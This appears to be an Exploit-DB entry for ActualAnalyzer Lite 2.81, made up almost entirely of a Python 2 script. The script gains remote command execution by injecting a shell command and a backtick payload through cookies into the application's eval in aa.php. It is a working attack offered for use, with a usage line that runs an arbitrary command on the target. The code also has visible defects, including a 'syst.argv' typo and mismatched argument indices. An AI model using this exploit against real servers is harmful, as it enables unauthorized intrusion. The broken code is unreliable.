ActualAnalyzer Lite 2.81 - Command Execution

EDB-ID:

34450

CVE:





Platform:

PHP

Date:

2014-08-28


###############################
# ActualAnalyzer  exploit.
# Tested on Lite version 
# We load command into a dummy variable as we only have 6 characters to own the eval 
# but load more as first 2 characters get rm'd.
# We then execute the eval with backticks.
# 11/05/2011
##############################

import urllib
import urllib2
import sys
import time



def banner():
	print "	    ____                        __              __                  __                     "
	print "	   / __/_  ______ _ ____ ______/ /___  ______ _/ /___ _____  ____ _/ /_  ______  ___  _____"
	print "	  / /_/ / / / __ `// __ `/ ___/ __/ / / / __ `/ / __ `/ __ \/ __ `/ / / / /_  / / _ \/ ___/"
	print "	 / __/ /_/ / /_/ // /_/ / /__/ /_/ /_/ / /_/ / / /_/ / / / / /_/ / / /_/ / / /_/  __/ /    "
	print "	/_/  \__,_/\__, (_)__,_/\___/\__/\__,_/\__,_/_/\__,_/_/ /_/\__,_/_/\__, / /___/\___/_/     "
	print "	             /_/                                                  /____/                   "


def usage():
	print "	[+] Usage:"
	print "	[-] python " + sys.argv[0] + " -h vulnHOST -d analyticdomain -c \"command\""
	print "	[-] python fuq.actualanalyzer.py -h test.com/lite -d analyticdomain -c \"touch /tmp/123\""

banner()
if len(sys.argv) < 6:
	usage()
	quit()
domain = sys.argv[2]
command = sys.argv[6]
host = syst.argv[4]

def commandexploit(domain,host,command):
	url = 'http://' + domain + '/aa.php?anp=' + host 
	data = None
	headers = {'Cookie': "ant=" + command + "; anm=414.`$cot`"}
	exploit1 = urllib2.Request(url,data,headers)
	exploit2 = urllib2.urlopen(exploit1)

commandexploit(domain,host,command)